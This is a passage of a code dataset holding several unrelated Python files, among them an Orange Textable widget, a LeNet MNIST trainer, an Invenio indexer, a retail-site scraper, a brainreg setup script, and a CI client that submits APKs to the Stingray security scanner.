re.split(' +/ +', self.newURL)\n for URL in URLList:\n self.URLs.append((\n URL,\n self.encoding,\n self.newAnnotationKey,\n self.newAnnotationValue))\n\n self.sendButton.settingsChanged()\n\n def updateGUI(self):\n \"\"\"Update GUI state\"\"\"\n if self.displayAdvancedSettings:\n if self.selectedURLLabel:\n cachedLabel = self.selectedURLLabel[0]\n else:\n cachedLabel = None\n del self.URLLabel[:]\n if self.URLs:\n URLs = [ f[0] for f in self.URLs ]\n encodings = [ f[1] for f in self.URLs ]\n annotations = [ '{%s: %s}' % (f[2], f[3]) for f in self.URLs ]\n maxURLLen = max([ len(n) for n in URLs ])\n maxAnnoLen = max([ len(a) for a in annotations ])\n for index in xrange(len(self.URLs)):\n format = '%-' + unicode(maxURLLen + 2) + 's'\n URLLabel = format % URLs[index]\n if maxAnnoLen > 4:\n if len(annotations[index]) > 4:\n format = '%-' + unicode(maxAnnoLen + 2) + 's'\n URLLabel += format % annotations[index]\n else:\n URLLabel += ' ' * (maxAnnoLen + 2)\n URLLabel += encodings[index]\n self.URLLabel.append(URLLabel)\n\n self.URLLabel = self.URLLabel\n if cachedLabel is not None:\n self.sendButton.sendIfPreCallback = None\n self.selectedURLLabel.listBox.item(cachedLabel).setSelected(1)\n self.sendButton.sendIfPreCallback = self.updateGUI\n if self.newURL:\n if self.newAnnotationKey and self.newAnnotationValue or not self.newAnnotationKey and not self.newAnnotationValue:\n self.addButton.setDisabled(False)\n else:\n self.addButton.setDisabled(True)\n else:\n self.addButton.setDisabled(True)\n if self.autoNumber:\n self.autoNumberKeyLineEdit.setDisabled(False)\n else:\n self.autoNumberKeyLineEdit.setDisabled(True)\n if self.importURLs:\n self.importURLsKeyLineEdit.setDisabled(False)\n else:\n self.importURLsKeyLineEdit.setDisabled(True)\n self.updateURLBoxButtons()\n self.advancedSettings.setVisible(True)\n else:\n self.advancedSettings.setVisible(False)\n self.adjustSizeWithTimer()\n return\n\n def updateURLBoxButtons(self):\n \"\"\"Update state of File box buttons\"\"\"\n if self.selectedURLLabel:\n self.removeButton.setDisabled(False)\n if self.selectedURLLabel[0] > 0:\n self.moveUpButton.setDisabled(False)\n else:\n self.moveUpButton.setDisabled(True)\n if self.selectedURLLabel[0] < len(self.URLs) - 1:\n self.moveDownButton.setDisabled(False)\n else:\n self.moveDownButton.setDisabled(True)\n else:\n self.moveUpButton.setDisabled(True)\n self.moveDownButton.setDisabled(True)\n self.removeButton.setDisabled(True)\n if len(self.URLs):\n self.clearAllButton.setDisabled(False)\n self.exportButton.setDisabled(False)\n else:\n self.clearAllButton.setDisabled(True)\n self.exportButton.setDisabled(True)\n\n def adjustSizeWithTimer(self):\n qApp.processEvents()\n QTimer.singleShot(50, self.adjustSize)\n\n def setCaption(self, title):\n if 'captionTitle' in dir(self) and title != 'Orange Widget':\n OWWidget.setCaption(self, title)\n self.sendButton.settingsChanged()\n else:\n OWWidget.setCaption(self, title)\n\n def onDeleteWidget(self):\n self.clearCreatedInputs()\n\n def getSettings(self, *args, **kwargs):\n settings = OWWidget.getSettings(self, *args, **kwargs)\n settings['settingsDataVersion'] = __version__.split('.')[:2]\n return settings\n\n def setSettings(self, settings):\n if settings.get('settingsDataVersion', None) == __version__.split('.')[:2]:\n settings = settings.copy()\n del settings['settingsDataVersion']\n OWWidget.setSettings(self, settings)\n return\n\n\nif __name__ == '__main__':\n appl = QApplication(sys.argv)\n ow = OWTextableURLs()\n ow.show()\n appl.exec_()\n 
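# Standalone test harness: build the widget, run the Qt event loop, and\n    # persist the widget settings on exit.\n    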
ow.saveSettings()","sub_path":"pycfiles/Orange_Textable-2.0.1-py2.7/OWTextableURLs.py","file_name":"OWTextableURLs.py","file_ext":"py","file_size_in_byte":24770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"246912990","text":"from models.lenet import LeNet\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom sklearn.preprocessing import LabelBinarizer\nfrom keras.optimizers import SGD\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom keras import backend as K\n\n\n# grab the MNIST dataset (if this is your first time using this dataset then the 55MB \n# download may take a minute)\nprint(\"[INFO] accessing MNIST...\")\nX, y = datasets.fetch_openml('mnist_784', version=1, return_X_y=True)\n\nif K.image_data_format() == \"channels_first\":\n X = X.reshape(X.shape[0], 1, 28, 28)\n\n# otherwise, we are using \"channels last\" ordering, so the design\n# matrix shape should be: num_samples x rows x columns x depth\nelse:\n X = X.reshape(X.shape[0], 28, 28, 1)\n\nX = X.astype(\"float\") / 255.0\n\nlb = LabelBinarizer()\ny = lb.fit_transform(y) \n\n(trainX, testX, trainY, testY) = train_test_split(X, y, test_size=0.25, random_state=42)\n\nprint(\"[INFO] compiling model...\")\nopt = SGD(0.01)\nmodel = LeNet.build(width=28, height=28, depth=1, classes=10)\nmodel.compile(loss='categorical_crossentropy', optimizer = opt, metrics = ['accuracy'])\n\n# train the network\nprint(\"[INFO] training network...\")\nH = model.fit(trainX, trainY, validation_data=(testX, testY), batch_size=128, epochs=20, verbose=1)\n\n# evaluate the network\nprint(\"[INFO] evaluating network...\")\npredictions = model.predict(testX, batch_size=128)\nprint(classification_report(testY.argmax(axis=1), predictions.argmax(axis=1), target_names=[str(x) for x in lb.classes_]))\n\n# plot the training loss and accuracy\nplt.style.use(\"ggplot\")\nplt.figure()\nplt.plot(np.arange(0, 20), H.history[\"loss\"], label=\"train_loss\")\nplt.plot(np.arange(0, 20), H.history[\"val_loss\"], label=\"val_loss\")\nplt.plot(np.arange(0, 20), H.history[\"acc\"], label=\"train_acc\")\nplt.plot(np.arange(0, 20), H.history[\"val_acc\"], label=\"val_acc\")\nplt.title(\"Training Loss and Accuracy\")\nplt.xlabel(\"Epoch #\")\nplt.ylabel(\"Loss/Accuracy\")\nplt.legend()\nplt.show()","sub_path":"Starter_Bundle/lenet_mnist.py","file_name":"lenet_mnist.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"443755613","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2019 CERN.\n#\n# invenio-app-ils is free software; you can redistribute it and/or modify it\n# under the terms of the MIT License; see LICENSE file for more details.\n\n\"\"\"RecordRelation indexer APIs.\"\"\"\n\nfrom datetime import datetime\n\nfrom celery import shared_task\nfrom flask import current_app\nfrom invenio_indexer.api import RecordIndexer\n\nfrom invenio_app_ils.indexer import ReferencedRecordsIndexer\nfrom invenio_app_ils.records.api import IlsRecord\n\n\n@shared_task(ignore_result=True)\ndef index_related_records(indexed, related):\n \"\"\"Index related records.\"\"\"\n referenced = []\n for pid, pid_type in related:\n referenced.append(dict(\n pid_type=pid_type,\n record=IlsRecord.get_record_by_pid(pid, pid_type=pid_type)\n ))\n\n indexer = ReferencedRecordsIndexer()\n indexer.index(indexed, referenced)\n\n\nclass 
RecordRelationIndexer(RecordIndexer):\n    \"\"\"Indexer class for RecordRelation record.\"\"\"\n\n    def index(self, record, *records):\n        \"\"\"Index a RecordRelation.\"\"\"\n        super().index(record)\n        referenced = set()\n        indexed = dict(pid_type=record._pid_type, record=record)\n\n        def add_referenced(pid, pid_type):\n            if not (pid == record[\"pid\"] and pid_type == record._pid_type):\n                referenced.add((pid, pid_type))\n\n        for rec in records:\n            add_referenced(rec[\"pid\"], rec._pid_type)\n            relations = rec.relations.get()\n            for relation_type, related_records in relations.items():\n                for obj in related_records:\n                    add_referenced(obj[\"pid\"], obj[\"pid_type\"])\n\n        eta = datetime.utcnow() + current_app.config[\"ILS_INDEXER_TASK_DELAY\"]\n        index_related_records.apply_async((indexed, list(referenced)), eta=eta)\n","sub_path":"invenio_app_ils/records_relations/indexer.py","file_name":"indexer.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"621712034","text":"from utils import *\nfrom bs4 import BeautifulSoup as BSoup\nfrom saveToDB import *\nfrom settings import ERR_MSG\n\n\ndef get_garbarino_product_price_by_classname(product, classname):\n    try:\n        element = product.find(\"span\", {\"class\": classname}).text.strip()\n    except AttributeError:\n        return None\n    if element:\n        return int(delete_comma_cents(element.split()[0].strip(\"$\").replace(\".\",\"\")))\n    return None # no list price\n\n\ndef garbarino_crawl(driver, url, settings):\n    \"\"\"\n    Crawls and returns list of products\n    :param driver: driver object\n    :param url: base url + section\n    :param settings: crawler settings\n    :return: list of products\n    \"\"\"\n    products = list()\n    try:\n        driver.get(url)\n    except (WebDriverException, TimeoutException):  # 'except A or B' only catches A; a tuple catches both\n        driver.close()\n        raise WebDriverException()\n    while True:\n        bs_obj = BSoup(driver.page_source, 'lxml')\n        products_info_wrapper = bs_obj.find_all(\"div\", {\"class\": settings[\"info_wrapper\"]})\n        for product in products_info_wrapper:\n            try:\n                product_data = {\"description\": product.find(\"h3\", {\"class\": settings[\"product_name_attribute\"]}).text,\n                                \"company\": \"GARBARINO\"}\n            except AttributeError:\n                raise AttributeError(settings[ERR_MSG[\"FIND_ELEMENT\"]])\n            try:\n                product_data[\"list_price\"] = get_garbarino_product_price_by_classname(product, GARBARINO_WEBSITE_PRODUCT_PRICE_ATTRIBUTE)\n                product_data[\"discount_price\"] = get_garbarino_product_price_by_classname(product, GARBARINO_WEBSITE_PRODUCT_PRICE_DISCOUNT_ATTRIBUTE)\n            except AttributeError:\n                raise AttributeError(settings[ERR_MSG[\"FIND_ELEMENT\"]])\n            product_data[\"href\"] = GARBARINO_CRAWLER_SETTINGS[\"url\"] + product.find_all(\"a\", href=True)[0][\"href\"]\n            products.append(product_data)\n        try:\n            next_page_arrow = bs_obj.find_all(\"li\", {\"class\": \"pagination__page\"})[-1].span\n        except Exception:\n            return products\n        if next_page_arrow:\n            driver.find_elements_by_class_name(\"pagination__page\")[-1].click()\n        else:\n            return products\n\n\ngarbarino_chrome_driver = get_driver()\nfor section in GARBARINO_WEBSITE_SECTIONS:\n    try:\n        products = garbarino_crawl(garbarino_chrome_driver, GARBARINO_WEBSITE+section, GARBARINO_CRAWLER_SETTINGS)\n        for product in products:\n            process_and_save_to_db(product)\n    except WebDriverException:\n        raise 
WebDriverException(ERR_MSG[\"GET_URL\"])\n\n\ngarbarino_chrome_driver.close()\n","sub_path":"scrapGarbarino.py","file_name":"scrapGarbarino.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"12873820","text":"import os\nimport sys\nfrom pstats import Stats\n\nimport glob\n\n\ndef stats_prof(filename):\n    stat = Stats(filename, stream=sys.stdout)\n    stat.print_stats()\n\ndef stats(pwd):\n    for dirpath, dirnames, filenames in os.walk(pwd):\n        for filename in filenames:\n            if filename.endswith('.prof'):\n                prof = os.path.join(dirpath, filename)\n                stats_prof(prof)\n                print()\n\n\ndef stats2(pwd):\n    for filename in glob.glob(pwd + '/*.prof'):\n        stats_prof(filename)\n\n\nif __name__ == '__main__':\n    pwd = os.path.abspath(os.path.dirname(__file__))  # __file__ (not __name__) locates this script's directory\n    stats2(pwd)\n\n","sub_path":"tools/read_prof.py","file_name":"read_prof.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"553941235","text":"from setuptools import setup, find_namespace_packages\nfrom os import path\n\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, \"README.md\"), encoding=\"utf-8\") as f:\n    long_description = f.read()\n\nrequirements = [\n    \"numpy\",\n    \"tables\",\n    \"scikit-image\",\n    \"pandas\",\n    \"napari>=0.4.5\",\n    \"napari-plugin-engine >= 0.1.4\",\n    \"imlib >= 0.0.26\",\n    \"dask >= 2.15.0\",\n    \"imio\",\n    \"brainglobe-napari-io\",\n]\n\n\nsetup(\n    name=\"brainreg-segment\",\n    version=\"0.2.12\",\n    author=\"Adam Tyson, Horst Obenhaus\",\n    author_email=\"code@adamltyson.com\",\n    license=\"BSD-3-Clause\",\n    description=\"Manual segmentation of 3D brain structures in a common anatomical space\",\n    long_description=long_description,\n    long_description_content_type=\"text/markdown\",\n    install_requires=requirements,\n    extras_require={\n        \"dev\": [\n            \"black\",\n            \"pytest-cov\",\n            \"pytest\",\n            \"pytest-qt\",\n            \"coverage\",\n            \"bump2version\",\n            \"pre-commit\",\n            \"flake8\",\n        ]\n    },\n    url=\"https://brainglobe.info/\",\n    project_urls={\n        \"Source Code\": \"https://github.com/brainglobe/brainreg-segment\",\n        \"Bug Tracker\": \"https://github.com/brainglobe/brainreg-segment/issues\",\n        \"Documentation\": \"https://docs.brainglobe.info/brainreg-segment\",\n        \"User Support\": \"https://forum.image.sc/tag/brainglobe\",\n    },\n    python_requires=\">=3.7\",\n    packages=find_namespace_packages(exclude=(\"docs\", \"tests*\")),\n    entry_points={\n        \"console_scripts\": [\n            \"brainreg-segment = brainreg_segment.segment:main\",\n        ],\n        \"napari.plugin\": [\"brainreg-segment = brainreg_segment.plugins\"],\n    },\n    include_package_data=True,\n    classifiers=[\n        \"Development Status :: 4 - Beta\",\n        \"Operating System :: POSIX :: Linux\",\n        \"Operating System :: Microsoft :: Windows :: Windows 10\",\n        \"Framework :: napari\",\n        \"Programming Language :: Python\",\n        \"Programming Language :: Python :: 3.7\",\n        \"Programming Language :: Python :: 3.8\",\n        \"Programming Language :: Python :: 3.9\",\n        \"Intended Audience :: Developers\",\n        \"Intended Audience :: Science/Research\",\n    ],\n    zip_safe=False,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"443358809","text":"import requests\nimport urllib3\nimport argparse\nfrom datetime import datetime\nimport sys\nimport os\nimport 
time\nimport json\n\n\nSUCCESS = 1\nFAILURE = 2\nIN_PROGRESS = 3\nNOT_STARTED = 4\nSTARTED = 5\nSTOPPED = 6\n\n\nclass DistributionSystem:\n    \"\"\"\n    Base class for various distribution systems such as HockeyApp, Firebase, AppsFlyer, etc.\n    \"\"\"\n    url = ''\n    download_path = ''\n\n    def __init__(self, app_identifier, app_version):\n        self.app_identifier = app_identifier\n        self.app_version = app_version\n\n    def download_app(self):\n        pass\n\n\nclass HockeyApp(DistributionSystem):\n    \"\"\"\n    Downloading application from HockeyApp distribution system\n    \"\"\"\n    url = 'https://rink.hockeyapp.net/api/2'\n    download_path = 'downloaded_apps'\n\n    def __init__(self, token, app_bundle, app_identifier, version):\n        super().__init__(app_bundle, version)\n\n        self.app_identifier = app_identifier\n        self.auth_header = {'X-HockeyAppToken': token}\n\n    def get_apps(self):\n        \"\"\"\n        Get list of available applications\n        :return: list of all applications (dict)\n        \"\"\"\n        log.info('HockeyApp - Get list of available applications')\n        response = requests.get('{0}/{1}'.format(self.url, 'apps'), headers=self.auth_header)\n        if response.status_code != 200:\n            log.error('HockeyApp - Error while getting application list, status code: {0}'.format(response.status_code))\n            sys.exit(4)\n\n        app_list = response.json()\n        return app_list.get('apps', [])\n\n    def get_versions_info(self):\n        \"\"\"\n        Get all available versions of current application\n        :return: list of versions (dict)\n        \"\"\"\n        log.info('HockeyApp - Get all available versions of current application')\n        if not self.app_identifier:\n            for application in self.get_apps():\n                if application['bundle_identifier'] != self.app_identifier:\n                    continue\n                self.app_identifier = application['public_identifier']\n\n        versions_info_url = '{0}/{1}/{2}/{3}'.format(self.url, 'apps', self.app_identifier, 'app_versions')\n        response = requests.get(versions_info_url, headers=self.auth_header)\n        if response.status_code != 200:\n            log.error('HockeyApp - Error while getting application versions info, status code: {0}'.format(response.status_code))\n            sys.exit(4)\n\n        return response.json().get('app_versions', [None])\n\n    def get_version(self):\n        \"\"\"\n        Return specified version of application\n        :return: dict() with metainfo about application version\n        \"\"\"\n        log.info('HockeyApp - Get data about specified version')\n        application_version = None  # guard against UnboundLocalError when no version matches\n        if self.app_version == 'latest':\n            application_version = self.get_versions_info()[0]\n            return application_version\n\n        for version in self.get_versions_info():\n            if version['version'] != self.app_version:\n                continue\n\n            application_version = version\n\n        return application_version\n\n    def download_app(self):\n        \"\"\"\n        Download application\n        :return:\n        \"\"\"\n        application_for_download = self.get_version()\n        if not application_for_download:\n            log.error('HockeyApp - Error while getting specified application version, exit')\n            sys.exit(4)\n\n        download_url = '{0}?format=apk'.format(application_for_download['download_url'].replace('/apps/', '/api/2/apps/'))\n        log.info('HockeyApp - Start download application {0} with version {1}'.format(\n            self.app_identifier,\n            application_for_download['version']))\n\n        response = requests.get(download_url, headers=self.auth_header, allow_redirects=True)\n        if response.status_code != 200:\n            log.error('HockeyApp - Failed to download application. 
Request return status code: {0}'.format(response.status_code))\n            sys.exit(4)\n\n        file_name = '{0}-{1}.apk'.format(self.app_identifier, application_for_download['version'])\n        path_to_save = os.path.join(self.download_path, file_name)\n\n        if not os.path.exists(self.download_path):\n            os.mkdir(self.download_path)\n\n        with open(path_to_save, 'wb') as file:\n            file.write(response.content)\n\n        log.info('HockeyApp - Download application successfully completed to {0}'.format(path_to_save))\n\n        return path_to_save\n\n\nclass AppCenter(DistributionSystem):\n    \"\"\"\n    Downloading application from AppCenter distribution system\n    \"\"\"\n    url = 'https://api.appcenter.ms/v0.1'\n    download_path = 'downloaded_apps'\n\n    def __init__(self, token, app_name, owner_name, version, id):\n        super().__init__(app_name, version)\n\n        self.id = id\n        self.owner_name = owner_name\n        self.auth_header = {'X-API-Token': token}\n\n    def get_version_info_by_id(self):\n        log.info('AppCenter - Get information about application')\n        url = '{0}/apps/{1}/{2}/releases/{3}'.format(self.url, self.owner_name, self.app_identifier, self.id)\n        response = requests.get(url, headers=self.auth_header)\n        if response.status_code != 200:\n            log.error(\n                'AppCenter - Failed to get information about application release. Request return status code: {0}'.format(\n                    response.status_code))\n            sys.exit(4)\n\n        version_info = response.json()\n        return version_info\n\n    def get_version_info_by_version(self):\n        url = '{0}/apps/{1}/{2}/releases?scope=tester'.format(self.url, self.owner_name, self.app_identifier)\n\n        response = requests.get(url, headers=self.auth_header)\n        if response.status_code != 200:\n            log.error(\n                'AppCenter - Failed to get information about application releases. Request return status code: {0}'.format(\n                    response.status_code))\n            sys.exit(4)\n\n        versions_info = response.json()\n        for version in versions_info:\n            if version['version'] != self.app_version:\n                continue\n\n            self.id = version['id']\n            version_info = self.get_version_info_by_id()\n            return version_info\n\n        return None\n\n    def download_app(self):\n        if self.id:\n            version_info = self.get_version_info_by_id()\n        else:\n            version_info = self.get_version_info_by_version()\n\n        if not version_info:\n            log.error('AppCenter - Failed to get app version information. Verify that you set up arguments correctly and try again')\n            sys.exit(4)\n\n        log.info('AppCenter - Start download application')\n        download_url = version_info.get('download_url')\n\n        response = requests.get(download_url, headers=self.auth_header, allow_redirects=True)\n        if response.status_code != 200:\n            log.error('AppCenter - Failed to download application. 
Request return status code: {0}'.format(\n                response.status_code))\n            sys.exit(4)\n\n        file_name = '{0}-{1}.apk'.format(self.app_identifier, version_info['version'])\n        path_to_save = os.path.join(self.download_path, file_name)\n\n        if not os.path.exists(self.download_path):\n            os.mkdir(self.download_path)\n\n        with open(path_to_save, 'wb') as file:\n            file.write(response.content)\n\n        log.info('AppCenter - Download application successfully completed to {0}'.format(path_to_save))\n\n        return path_to_save\n\n\n\nclass Stingray:\n    \"\"\"\n    Class for interacting with the Stingray system through its REST API\n    \"\"\"\n    def __init__(self, base_url, token, file, profile, testcase):\n        # self.report_path = 'stingray_scan_report.json'\n        self.headers = {'Access-token': token}\n        self.url = base_url\n        self.apk_file = file\n        self.profile = profile\n        self.testcase = testcase\n\n    def get(self, url):\n        \"\"\"\n        GET method for the Stingray REST API.\n        Makes 3 attempts before failing the script\n        :param url: url to get\n        :return: response\n        \"\"\"\n        response = requests.get(url, headers=self.headers)\n        if response.status_code not in (200, 201):\n            for i in range(2):\n                time.sleep(3)\n                log.info('Error in request, status code: {0}. Try to get info one more time. Attempt: {1}'.format(\n                    response.status_code, i))\n                response = requests.get(url, headers=self.headers)\n                if response.status_code in (200, 201):\n                    break\n\n        return response\n\n    def _response_json(self, response):\n        \"\"\"\n        Get JSON data from response. If something goes wrong, exit with error code 5\n        :param response:\n        :return:\n        \"\"\"\n        try:\n            return response.json()\n        except Exception as e:\n            log.error('Error when get json from response: {0}. Response status: {1}'.format(e, response.status_code))\n            sys.exit(5)\n\n    def start_scan(self):\n        \"\"\"\n        Start automated scan through REST API\n        :return: scan info (dict)\n        \"\"\"\n        if not os.path.exists(self.apk_file):\n            log.error('APK not exist at file path. 
exit with error code 2')\n sys.exit(2)\n\n multipart_form_data = {\n 'file': (os.path.split(self.apk_file)[-1], open(self.apk_file, 'rb')),\n 'profile_id': (None,self.profile),\n 'testcase_id': (None,self.testcase)\n }\n\n scan_response = requests.post('{0}/rest/scan/cd'.format(self.url), headers=self.headers, files=multipart_form_data)\n\n # remove it when the correct responses will be provided by api in that case\n if scan_response.status_code == 500:\n log.error('Please check the correctness of the provided testcase id')\n # remove it when the correct responses will be provided by api in that case\n if scan_response.status_code == 401:\n log.error('Please check the correctness of the provided profile id')\n\n scan_object = self._response_json(scan_response)\n\n if scan_response.status_code != 201:\n log.error('Scan start error: {0}'.format(scan_object.get('message', 'N/A')))\n return False\n\n return scan_object.get('id', False)\n\n def get_scan_status(self, scan_id):\n \"\"\"\n Get scan status from current scan Id\n :param scan_id: Scan ID to get status\n :return:\n \"\"\"\n scan_response = self.get('{0}/rest/scanlist/{1}'.format(self.url, scan_id))\n scan_object = self._response_json(scan_response)\n if scan_response.status_code != 200:\n log.error('Get scan status error: {0}'.format(scan_object.get('message', 'N/A')))\n sys.exit(3)\n\n _scan_complete = False\n scan_status = scan_object.get('status', 0)\n if scan_status == SUCCESS:\n log.info('Scan complete successful')\n _scan_complete = True\n elif scan_status == FAILURE:\n log.error('Scan complete with error')\n _scan_complete = True\n elif scan_status == IN_PROGRESS:\n log.info('Scan in progress...')\n elif scan_status == NOT_STARTED:\n log.info('Scan starting...')\n elif scan_status == STARTED:\n log.info('Scan started')\n elif scan_status == STOPPED:\n log.info('Scan stopped. Analysing phase in progress...')\n else:\n log.error('Get scan status error. Exit with exit code 3')\n sys.exit(3)\n return _scan_complete\n\n def get_scan_result(self, scan_id):\n \"\"\"\n Get scan result from specified scan Id. 
Return all issues with description\n :param scan_id: Scan ID to get results\n :return:\n \"\"\"\n result_response = self.get('{0}/rest/scanresult/{1}/issues'.format(self.url, scan_id))\n result_object = self._response_json(result_response)\n if result_response.status_code != 200:\n log.error('Get scan result error: {0}'.format(result_object.get('message', 'N/A')))\n return None\n return result_object\n\n def get_short_stat(self, scan_id):\n \"\"\"\n Get short issue statistic from specified scan Id\n :param scan_id: Scan ID to get results\n :return:\n \"\"\"\n result_response = self.get('{0}/rest/scanresult/{1}/issuessummary'.format(self.url, scan_id))\n result_object = self._response_json(result_response)\n if result_response.status_code != 200:\n log.error('Get scan summary error: {0}'.format(result_object.get('message', 'N/A')))\n return {}\n return result_object\n\n def create_report(self, scan_result, type):\n \"\"\"\n Create json report with data specified\n :param scan_result: data to write as Json report\n :return: None\n \"\"\"\n if type == 'standard' or type == 'grouping':\n report_name = 'stingray_scan_{0}_report.json'.format(type)\n else:\n report_name = 'stingray_scan_report-testcase_{}.json'.format(self.testcase)\n with open(report_name, 'w') as f:\n f.write(json.dumps(scan_result, indent=4))\n\n\nclass Log:\n def info(self, message):\n self._log('INFO', message)\n\n def error(self, message):\n self._log('ERROR', message)\n\n def debug(self, message):\n self._log('DEBUG', message)\n\n def _log(self, level, message):\n current_date = datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\")\n message = '{time} - {level} {message}'.format(time=current_date, level=level, message=message)\n print(message)\n\nclass ValidateReport(argparse.Action):\n def __call__(self, parser, args, values, option_string=None):\n valid_types = ('standard', 'separate', 'grouping')\n reportType = values\n for i in reportType:\n if i not in valid_types:\n raise ValueError('invalid type {0}, supported types are {1}'.format(i, valid_types))\n setattr(args, self.dest, reportType)\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Start scan and get scan results from Stingray')\n parser.add_argument('--distribution_system', type=str, help='Select how to get apk file', choices=['file', 'hockeyapp', 'appcenter'], required=True)\n\n # Arguments used for distribution_system = file\n parser.add_argument('--file_path', type=str, help='Path to local apk file for analyze. This argument required if distribution system set to \"file\"')\n\n # Arguments used for distribution_system = hockeyapp\n parser.add_argument('--hockey_token', type=str, help='Auth token for HockeyApp. This argument required if distribution system set to \"hockeyapp\"')\n parser.add_argument('--hockey_bundle_id', type=str, help='Application bundle in HockeyApp. This argument or \"--hockey_public_id\" required if distribution system set to \"hockeyapp\"')\n parser.add_argument('--hockey_public_id', type=str, help='Application identifier in HockeyApp. This argument or \"--hockey_bundle_id\" required if distribution system set to \"hockeyapp\"')\n parser.add_argument('--hockey_version', type=str, help='Application version in HockeyApp. If not set - the latest version will be downloaded. This argument required if distribution system set to \"hockeyapp\"', default='latest')\n\n # Arguments used for distribution_system = appcenter\n parser.add_argument('--appcenter_token', type=str, help='Auth token for AppCenter. 
This argument required if distribution system set to \"appcenter\"')\n    parser.add_argument('--appcenter_owner_name', type=str, help='Application owner name in AppCenter. This argument required if distribution system set to \"appcenter\"')\n    parser.add_argument('--appcenter_app_name', type=str, help='Application name in AppCenter. This argument required if distribution system set to \"appcenter\"')\n    parser.add_argument('--appcenter_release_id', type=str, help='Release id in AppCenter. If not set - the latest release will be downloaded. This argument or \"--appcenter_app_version\" required if distribution system set to \"appcenter\"')\n    parser.add_argument('--appcenter_app_version', type=str, help='Application version in AppCenter. This argument or \"--appcenter_release_id\" required if distribution system set to \"appcenter\"')\n\n    # Arguments for Stingray\n    parser.add_argument('--stingray_url', type=str, help='Stingray url', required=True)\n    parser.add_argument('--token', type=str, help='CI/CD Token for start scan and get results', required=True)\n    parser.add_argument('--profile', type=int, help='Project id for scan', required=True)\n    parser.add_argument('--testcase', nargs='+', type=int, help='Testcase Id')\n    parser.add_argument('--report', nargs='*', type=str, help='Select which type of report should be created', action=ValidateReport, default=['standard'])\n\n    args = parser.parse_args()\n\n    if args.distribution_system == 'file' and args.file_path is None:\n        parser.error('\"--distribution_system file\" requires \"--file_path\" argument to be set')\n    elif args.distribution_system == 'hockeyapp' and (\n            args.hockey_token is None or\n            (args.hockey_bundle_id is None and args.hockey_public_id is None)):\n        parser.error('\"--distribution_system hockeyapp\" requires \"--hockey_token\" and \"--hockey_bundle_id\" or \"--hockey_public_id\" arguments to be set')\n    elif args.distribution_system == 'appcenter' and (\n            args.appcenter_token is None or args.appcenter_owner_name is None or args.appcenter_app_name is None or (\n            args.appcenter_release_id is None and args.appcenter_app_version is None)):\n        parser.error(\n            '\"--distribution_system appcenter\" requires \"--appcenter_token\", \"--appcenter_owner_name\", \"--appcenter_app_name\" and '\n            '\"--appcenter_release_id\" or \"--appcenter_app_version\" arguments to be set')\n    return args\n\ndef join_results(scans, type):\n    '''\n    Get scan results from several testcases and join them in one common result\n    '''\n\n    report = []\n    added = False\n\n    # Grouping of scan results: issues of the same type are joined together, and their details go to a list\n    if type == 'grouping':\n\n        for scan in scans:\n            for issue in scan:\n\n                if not report:\n                    report.append(scan[0])\n                    continue\n\n                for addedIssue in report:\n\n                    added = False\n                    if issue['name'] == addedIssue['name']:\n\n                        if issue['details'] != addedIssue['details'] and issue['details'] not in addedIssue['details']:\n                            if not isinstance(addedIssue['details'][0], list):\n                                temp=[]\n                                temp.append(addedIssue['details'])\n                                temp.append(issue['details'])\n                                addedIssue['details'] = temp\n                            else:\n                                addedIssue['details'].append(issue['details'])\n\n                        added = True\n                        addedIssue['id'].extend(issue['id'])\n                        if issue['scan_id'][0] not in addedIssue['scan_id']:\n                            addedIssue['scan_id'].extend(issue['scan_id'])\n                        break\n\n                if not added:\n                    report.append(issue)\n    # Standard report: same issues from different testcases are joined to avoid duplicates\n    else:\n        for scan in scans:\n\n            if not report:\n                report.extend(scan)\n                continue\n            currReportLen = len(report)\n\n            for issue in 
scan:\n\n ind = 0\n added= False\n\n for addedIssue in report:\n\n ind += 1\n if issue['name'] == addedIssue['name'] and issue['details'] == addedIssue['details']:\n addedIssue['id'].extend(issue['id'])\n if issue['scan_id'][0] not in addedIssue['scan_id']:\n addedIssue['scan_id'].extend(issue['scan_id'])\n added = True\n break\n\n if ind == currReportLen and not added:\n report.append(issue)\n break\n return(report)\n\nif __name__ == '__main__':\n\n log = Log()\n urllib3.disable_warnings()\n\n arguments = parse_args()\n results = []\n\n stingray_url = arguments.stingray_url\n stingray_token = arguments.token\n stingray_profile = arguments.profile\n stingray_testcase_set = set(arguments.testcase)\n distribution_system = arguments.distribution_system\n\n report_types = arguments.report\n if not report_types:\n report_types = ['standard']\n\n apk_file = ''\n if distribution_system == 'file':\n apk_file = arguments.file_path\n elif distribution_system == 'hockeyapp':\n hockey_app = HockeyApp(arguments.hockey_token,\n arguments.hockey_bundle_id,\n arguments.hockey_public_id,\n arguments.hockey_version)\n apk_file = hockey_app.download_app()\n elif distribution_system == 'appcenter':\n appcenter = AppCenter(arguments.appcenter_token,\n arguments.appcenter_app_name,\n arguments.appcenter_owner_name,\n arguments.appcenter_app_version,\n arguments.appcenter_release_id)\n apk_file = appcenter.download_app()\n\n for stingray_testcase_id in stingray_testcase_set:\n\n if len(stingray_testcase_set) > 1:\n log.info('Processing testcase {0}'.format(stingray_testcase_id))\n else:\n if 'standard' in report_types:\n report_types.remove('standard')\n if not report_types:\n report_types = ['separate']\n\n stingray = Stingray(stingray_url, stingray_token, apk_file, stingray_profile, stingray_testcase_id)\n\n log.info('Start automated scan with test case Id: {0}, profile Id: {1} and file: {2}'.format(\n 